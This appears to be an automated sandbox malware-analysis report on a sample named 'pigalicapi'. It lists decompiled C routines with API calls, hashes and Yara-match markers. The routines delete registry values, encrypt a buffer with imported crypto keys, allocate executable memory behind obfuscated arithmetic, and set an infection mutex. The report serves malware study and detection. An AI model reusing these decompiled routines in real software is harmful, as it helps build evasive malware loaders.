                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 808621155-0
                                                                                                                                                                                                                                                                            • Opcode ID: e1a6f0ba99ab7a38bcbe7be101def3f975d7ce7d7b0dfc525552593c189b4346
                                                                                                                                                                                                                                                                            • Instruction ID: d74f0377ed2498e8549c1df4d31e09974c34d6665eb8ca26b06fd040fbf8fd7d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a6f0ba99ab7a38bcbe7be101def3f975d7ce7d7b0dfc525552593c189b4346
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A51EA74900209EFDB08CF98C998BEEBBB6FF48305F148559E515A7384D375AA80CFA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01176CF0() {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                                                            				char* _t26;
                                                                                                                                                                                                                                                                            				char* _t30;
                                                                                                                                                                                                                                                                            				char* _t32;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x118435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                                            				_t32 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                                                                            					_v24 = 0x20;
                                                                                                                                                                                                                                                                            					_v20 = 3;
                                                                                                                                                                                                                                                                            					_t30 =  *0x1181890; // 0x1183fa6
                                                                                                                                                                                                                                                                            					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                            					_v28 = _t24;
                                                                                                                                                                                                                                                                            					if(_v28 == 0) {
                                                                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                                                                            						_t26 =  *0x1181890; // 0x1183fa6
                                                                                                                                                                                                                                                                            						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x01176cf6
                                                                                                                                                                                                                                                                            0x01176cfa
                                                                                                                                                                                                                                                                            0x01176d0a
                                                                                                                                                                                                                                                                            0x01176d0c
                                                                                                                                                                                                                                                                            0x01176d0c
                                                                                                                                                                                                                                                                            0x01176d13
                                                                                                                                                                                                                                                                            0x01176d25
                                                                                                                                                                                                                                                                            0x01176d30
                                                                                                                                                                                                                                                                            0x01176d38
                                                                                                                                                                                                                                                                            0x01176d3a
                                                                                                                                                                                                                                                                            0x01176d41
                                                                                                                                                                                                                                                                            0x01176d56
                                                                                                                                                                                                                                                                            0x01176d61
                                                                                                                                                                                                                                                                            0x01176d67
                                                                                                                                                                                                                                                                            0x01176d6e
                                                                                                                                                                                                                                                                            0x01176d70
                                                                                                                                                                                                                                                                            0x01176d74
                                                                                                                                                                                                                                                                            0x01176d7e
                                                                                                                                                                                                                                                                            0x01176d7e
                                                                                                                                                                                                                                                                            0x01176d88
                                                                                                                                                                                                                                                                            0x01176d88
                                                                                                                                                                                                                                                                            0x01176d94

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,01183B88,00000000,000F003F,00000000), ref: 01176D30
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,01183FA6,00000000,00000003,?,00000020), ref: 01176D61
                                                                                                                                                                                                                                                                            • RegDeleteValueA.ADVAPI32(00000000,01183FA6), ref: 01176D7E
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 01176D88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: cf53a72bdb841481b6d773cfafefcc7d414be51740ccc9791d34206b2db0d21a
                                                                                                                                                                                                                                                                            • Instruction ID: a243e83ba552627fef60a6b2709fcb05c01e990ea2c832785edadc19f7ecda97
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf53a72bdb841481b6d773cfafefcc7d414be51740ccc9791d34206b2db0d21a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82118CB5900209AFDB19DFE4D849BBFBBB8BB09304F00815CE620A7245D7B59685CBE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01178370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                                                            				intOrPtr* _v56;
                                                                                                                                                                                                                                                                            				long _v60;
                                                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v16 = _t79;
                                                                                                                                                                                                                                                                            					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t80;
                                                                                                                                                                                                                                                                            					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                            						_v24 = 0x1000;
                                                                                                                                                                                                                                                                            						_v20 = 0x1000;
                                                                                                                                                                                                                                                                            						_t85 = E01178800(_v16,  &_v24, _v12,  &_v20, 0x1183378, 0x94); // executed
                                                                                                                                                                                                                                                                            						if(_t85 != 0) {
                                                                                                                                                                                                                                                                            							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                            							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                            							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                            							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                            								_v40 = E01178770(_t170, 0xa);
                                                                                                                                                                                                                                                                            								_v36 = E011787D0(0xffffffff);
                                                                                                                                                                                                                                                                            								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            								_v32 = _t90;
                                                                                                                                                                                                                                                                            								if(_v32 != 0) {
                                                                                                                                                                                                                                                                            									_v44 = _a8;
                                                                                                                                                                                                                                                                            									E01177B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                            									_t94 = E01178970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                            									if(_t94 != 0) {
                                                                                                                                                                                                                                                                            										_v48 = _a12;
                                                                                                                                                                                                                                                                            										E011785D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                            										E011785D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                            										_v60 = 0;
                                                                                                                                                                                                                                                                            										_v56 = _v48;
                                                                                                                                                                                                                                                                            										E011785D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                            										_v52 = _v48;
                                                                                                                                                                                                                                                                            										E011785D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                            										E011785D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                            										E01178650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                            										E011785D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                            										 *_v56 = E011716F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                            										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                                                            0x01178376
                                                                                                                                                                                                                                                                            0x01178381
                                                                                                                                                                                                                                                                            0x011785c0
                                                                                                                                                                                                                                                                            0x011785c6
                                                                                                                                                                                                                                                                            0x011783b1
                                                                                                                                                                                                                                                                            0x011783bf
                                                                                                                                                                                                                                                                            0x011783c5
                                                                                                                                                                                                                                                                            0x011783d6
                                                                                                                                                                                                                                                                            0x011783dc
                                                                                                                                                                                                                                                                            0x011783e3
                                                                                                                                                                                                                                                                            0x011783f3
                                                                                                                                                                                                                                                                            0x011783fa
                                                                                                                                                                                                                                                                            0x0117841b
                                                                                                                                                                                                                                                                            0x01178425
                                                                                                                                                                                                                                                                            0x01178431
                                                                                                                                                                                                                                                                            0x01178435
                                                                                                                                                                                                                                                                            0x0117843b
                                                                                                                                                                                                                                                                            0x0117843e
                                                                                                                                                                                                                                                                            0x0117844e
                                                                                                                                                                                                                                                                            0x0117845b
                                                                                                                                                                                                                                                                            0x0117846b
                                                                                                                                                                                                                                                                            0x01178471
                                                                                                                                                                                                                                                                            0x01178478
                                                                                                                                                                                                                                                                            0x01178481
                                                                                                                                                                                                                                                                            0x01178490
                                                                                                                                                                                                                                                                            0x011784a8
                                                                                                                                                                                                                                                                            0x011784b2
                                                                                                                                                                                                                                                                            0x011784bb
                                                                                                                                                                                                                                                                            0x011784c8
                                                                                                                                                                                                                                                                            0x011784da
                                                                                                                                                                                                                                                                            0x011784e2
                                                                                                                                                                                                                                                                            0x011784ec
                                                                                                                                                                                                                                                                            0x011784f9
                                                                                                                                                                                                                                                                            0x01178504
                                                                                                                                                                                                                                                                            0x01178511
                                                                                                                                                                                                                                                                            0x01178525
                                                                                                                                                                                                                                                                            0x0117853c
                                                                                                                                                                                                                                                                            0x01178550
                                                                                                                                                                                                                                                                            0x01178576
                                                                                                                                                                                                                                                                            0x0117857e
                                                                                                                                                                                                                                                                            0x0117857e
                                                                                                                                                                                                                                                                            0x0117858c
                                                                                                                                                                                                                                                                            0x0117858c
                                                                                                                                                                                                                                                                            0x01178478
                                                                                                                                                                                                                                                                            0x0117843e
                                                                                                                                                                                                                                                                            0x01178425
                                                                                                                                                                                                                                                                            0x01178596
                                                                                                                                                                                                                                                                            0x011785a3
                                                                                                                                                                                                                                                                            0x011785a3
                                                                                                                                                                                                                                                                            0x011785ad
                                                                                                                                                                                                                                                                            0x011785ba
                                                                                                                                                                                                                                                                            0x011785ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011785ad

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 011783BF
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 011783D6
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0117846B
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 011789BF
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: GetLastError.KERNEL32 ref: 011789C9
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 011789F8
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 01178A1F
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01178A41
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: CryptDestroyKey.ADVAPI32(00000000), ref: 01178A4E
                                                                                                                                                                                                                                                                              • Part of subcall function 01178970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178A5A
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0117858C
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 011785A3
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 011785BA
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,01178420,00000000,00001000,00000000), ref: 0117883B
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: GetLastError.KERNEL32 ref: 01178845
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178874
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 011788AF
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 011788CF
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0117890C
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0117892A
                                                                                                                                                                                                                                                                              • Part of subcall function 01178800: CryptDestroyKey.ADVAPI32(?), ref: 01178937
                                                                                                                                                                                                                                                                              • Part of subcall function 011787D0: QueryPerformanceCounter.KERNEL32(?), ref: 011787E7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 487564122-0
                                                                                                                                                                                                                                                                            • Opcode ID: 219e19ba968a096d7891dd02d656c94473f1081ae1cd3f0d427fddb71d8445cc
                                                                                                                                                                                                                                                                            • Instruction ID: 349440e35e76bf9ed5ad322e24c39b44daf9d2e9b505cea324a4d1b688a577bd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 219e19ba968a096d7891dd02d656c94473f1081ae1cd3f0d427fddb71d8445cc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9713FB5D00209ABDB18DFA8DC85FEEB7B4AB48304F148119FA15B7384E7749644CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C71280(signed int _a4, signed int _a8, signed int _a20, signed int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                                                                            				long _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v40 = _a20 ^ 0x00002622;
                                                                                                                                                                                                                                                                            				_v28 = _a4 - 0x283a;
                                                                                                                                                                                                                                                                            				_v44 = _a8 - 0x253b;
                                                                                                                                                                                                                                                                            				_v60 = _a8 ^ 0x0000005e;
                                                                                                                                                                                                                                                                            				_v8 = _a24 + 0x261;
                                                                                                                                                                                                                                                                            				_v16 = _a4 ^ 0x0000283a;
                                                                                                                                                                                                                                                                            				_v20 = _a8 ^ 0x0000253b;
                                                                                                                                                                                                                                                                            				_v24 = _a24;
                                                                                                                                                                                                                                                                            				if(_v28 >= _v8 - 0x1d9) {
                                                                                                                                                                                                                                                                            					if(_v40 >= (_v16 ^ 0x00002633 | 0x00002687)) {
                                                                                                                                                                                                                                                                            						_v12 =  *0x00D0D498;
                                                                                                                                                                                                                                                                            						while(_v12 <= (_v24 | 0x000026e5)) {
                                                                                                                                                                                                                                                                            							_t78 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            							_t136 =  *0xd0d4cc; // 0xd0d3a8
                                                                                                                                                                                                                                                                            							_v56 =  *(_t78 + 0xbadc19) |  *(_t136 + 0xbadc65);
                                                                                                                                                                                                                                                                            							_v52 = (_v20 & _v44) + 0x2598;
                                                                                                                                                                                                                                                                            							_v48 = (_v16 & _v16) -  *0x00D0D3D0;
                                                                                                                                                                                                                                                                            							SetHandleInformation(_v56, _v52, _v48);
                                                                                                                                                                                                                                                                            							_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					 *(_a28 + 0x48) = ( *(_a28 + 0xd0) ^  *(_a28 + 0x10c)) +  *(_a28 + 0x48) - 0xe5304;
                                                                                                                                                                                                                                                                            					_v8 = _v8 - 0x269;
                                                                                                                                                                                                                                                                            					_v36 =  *((intOrPtr*)(_a28 + 0xbadbe5)) + 0x6e291e78;
                                                                                                                                                                                                                                                                            					_v32 = 0x40;
                                                                                                                                                                                                                                                                            					_t92 = VirtualAlloc(0,  *(_a28 + 0x48), _v36, _v32); // executed
                                                                                                                                                                                                                                                                            					 *0xd0d47c = _t92 + 0x2000;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v24 ^ 0x00000d9a;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x00c7128f
                                                                                                                                                                                                                                                                            0x00c7129b
                                                                                                                                                                                                                                                                            0x00c712a7
                                                                                                                                                                                                                                                                            0x00c712b0
                                                                                                                                                                                                                                                                            0x00c712bc
                                                                                                                                                                                                                                                                            0x00c712c8
                                                                                                                                                                                                                                                                            0x00c712d3
                                                                                                                                                                                                                                                                            0x00c712d9
                                                                                                                                                                                                                                                                            0x00c712e7
                                                                                                                                                                                                                                                                            0x00c71379
                                                                                                                                                                                                                                                                            0x00c7138d
                                                                                                                                                                                                                                                                            0x00c7139b
                                                                                                                                                                                                                                                                            0x00c713b6
                                                                                                                                                                                                                                                                            0x00c713bb
                                                                                                                                                                                                                                                                            0x00c713cc
                                                                                                                                                                                                                                                                            0x00c713db
                                                                                                                                                                                                                                                                            0x00c713f2
                                                                                                                                                                                                                                                                            0x00c71401
                                                                                                                                                                                                                                                                            0x00c71398
                                                                                                                                                                                                                                                                            0x00c71398
                                                                                                                                                                                                                                                                            0x00c7139b
                                                                                                                                                                                                                                                                            0x00c712e9
                                                                                                                                                                                                                                                                            0x00c71314
                                                                                                                                                                                                                                                                            0x00c71320
                                                                                                                                                                                                                                                                            0x00c71337
                                                                                                                                                                                                                                                                            0x00c7133a
                                                                                                                                                                                                                                                                            0x00c71352
                                                                                                                                                                                                                                                                            0x00c7135d
                                                                                                                                                                                                                                                                            0x00c7135d
                                                                                                                                                                                                                                                                            0x00c71415

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,?,00000040), ref: 00C71352
                                                                                                                                                                                                                                                                            • SetHandleInformation.KERNEL32(?,?,?), ref: 00C71401
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocHandleInformationVirtual
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2282314611-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: d10df1c13ba5540ebcdb41c9c74f51ca22abf5cb97c3834e0efda31f50d59be7
                                                                                                                                                                                                                                                                            • Instruction ID: 9ff8619356baaf4a064a993a1cc42870eaf713aa408c2a27c4ed260fa552b9d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d10df1c13ba5540ebcdb41c9c74f51ca22abf5cb97c3834e0efda31f50d59be7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8511C71A00109DFDB08CF98D894AADB7F6FF8C304F54816AE919AB394D734AA41CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32 ref: 00C7AC5C
                                                                                                                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 00C7AC7A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String
                                                                                                                                                                                                                                                                            • String ID: LCMapStringEx
                                                                                                                                                                                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                                            • Opcode ID: 5d1cdbdabf153de1fcaf14dd6a267de1e6e9aa909fd5785c3ab090fb2cc8043e
                                                                                                                                                                                                                                                                            • Instruction ID: cdb1eddc3365dbf340cfc6f1ceb888cbb08fce7d72a571de68a5664e745390b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d1cdbdabf153de1fcaf14dd6a267de1e6e9aa909fd5785c3ab090fb2cc8043e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D201E532500209FBCF129F91DD06EEE7F62EF4C750F058115FE1966160CB769931AB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01175E00() {
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                            				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                                                            0x01175e0c
                                                                                                                                                                                                                                                                            0x01175e25

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,01173BEB), ref: 01175E0C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,01173BEB), ref: 01175E12
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                            • String ID: pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                            • Opcode ID: ecbdca34d46738404c354d111d09aa6c1b7898c85ed9280772b1adf64815b2f9
                                                                                                                                                                                                                                                                            • Instruction ID: f43f7a15763b35dabc5334a03dfb4980d7d2442de295f59fccb2b964d998cfa5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecbdca34d46738404c354d111d09aa6c1b7898c85ed9280772b1adf64815b2f9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3C08C36284314EBE2182662FD4BB493AA89710F81F500035F12AD56C08A81A0C18B96
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

